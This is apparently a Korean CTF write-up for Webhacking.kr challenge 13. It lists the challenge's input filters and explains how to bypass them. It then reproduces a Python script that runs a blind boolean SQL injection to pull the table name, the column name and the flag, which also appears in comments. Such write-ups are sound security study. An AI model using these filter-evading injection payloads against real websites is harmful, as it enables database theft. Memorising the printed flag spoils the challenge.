Webhacking.kr 13번 문제풀이

안녕하세요.

 

웹 해킹 13번 문제풀이 하겠습니다.

 

 

 

제출 입력 칸에 파라미터 no=1, no=2, no=3을 입력하였을 때, 아래와 같은 그림이 나온 것을 확인하였다. 

 

필터링되는 입력 값: + / * - 공백류 전체(\t,\n,\r,+,%0a,%0b,%0c ...등) and && = LIKE LIMIT WHERE GROUP ASCII /**/ 0x CHAR()

 

 

우리는 위와 같은 그림을 보아 참과 거짓 값을 이용하여 FLAG의 정보를 알아내야 할 것이다.

 

필터링되는 값에 =, LIKE ->  in 으로 공백-> ()으로 문자는 이진수로 우회하여 DB정보를 알아낼 것이다.

 

 

 

DB정보를 알아내기 위한 Python코드는 아래와 같다. (출처: donghyunlee.gitbook.io/write-up/wargame/webhacking.kr/old-13-1000)

 

import urllib.request

URL = 'https://webhacking.kr/challenge/web-10/?no='
TRUE_PHRASE = '<td>1</td>'


def query(payload):
    req = urllib.request.Request(URL + payload)
    r = urllib.request.urlopen(req)
    content = r.read().decode('utf-8')
    return TRUE_PHRASE in content


# 13
def find_table_name_length():
    table_name_len = 1
    while query('LENGTH((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)))IN({})'.format(table_name_len)) is False:
        table_name_len += 1
    print('table_name_len: {}'.format(table_name_len))
    return table_name_len


# flag_ab733768
def find_table_name():
    table_name_len = find_table_name_length()
    table_name = ''
    for pos in range(1, table_name_len + 1):
        for character in range(0, 128):
            if query('ORD(SUBSTR((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)),{},1))IN({})'.format(pos, character)) is True:
                table_name += chr(character)
                break
    print('table_name: {}'.format(table_name))
    return table_name


# 13
def find_column_name_length(table_name):
    table_name = ''.join(f'{ord(i):08b}' for i in table_name)
    column_name_len = 1
    while query('LENGTH((SELECT(MIN(IF((SELECT(TABLE_NAME)IN(0b{})),COLUMN_NAME,NULL)))FROM(INFORMATION_SCHEMA.COLUMNS)))IN({})'.format(table_name, column_name_len)) is False:
        column_name_len += 1
    print('column_name_len: {}'.format(column_name_len))
    return column_name_len


# flag_3a55b31d
def find_column_name(table_name):
    column_name_len = find_column_name_length(table_name)
    table_name = ''.join(f'{ord(i):08b}' for i in table_name)
    column_name = ''
    for pos in range(1, column_name_len + 1):
        for character in range(0, 128):
            if query('ORD(SUBSTR((SELECT(MIN(IF((SELECT(TABLE_NAME)IN(0b{})),COLUMN_NAME,NULL)))FROM(INFORMATION_SCHEMA.COLUMNS)),{},1))IN({})'.format(table_name, pos, character)) is True:
                column_name += chr(character)
                break
    print('column_name: {}'.format(column_name))
    return column_name


# 27
def find_flag_length(column_name, table_name):
    flag_len = 1
    while query('LENGTH((SELECT(MAX({}))FROM({})))IN({})'.format(column_name, table_name, flag_len)) is False:
        flag_len += 1
    print('flag_len: {}'.format(flag_len))
    return flag_len


# FLAG{challenge13gummyclear}
def find_flag():
    table_name = find_table_name()
    column_name = find_column_name(table_name)
    flag_len = find_flag_length(column_name, table_name)
    flag = ''
    for pos in range(1, flag_len + 1):
        for character in range(0, 128):
            if query('ORD(SUBSTR((SELECT(MAX({}))FROM({})),{},1))IN({})'.format(column_name, table_name, pos, character)) is True:
                flag += chr(character)
                break
    print('flag: {}'.format(flag))


find_flag()

 

결과로 나온 flag 값을 입력 후 제출하면 문제 해결~!

 

 

감사합니다.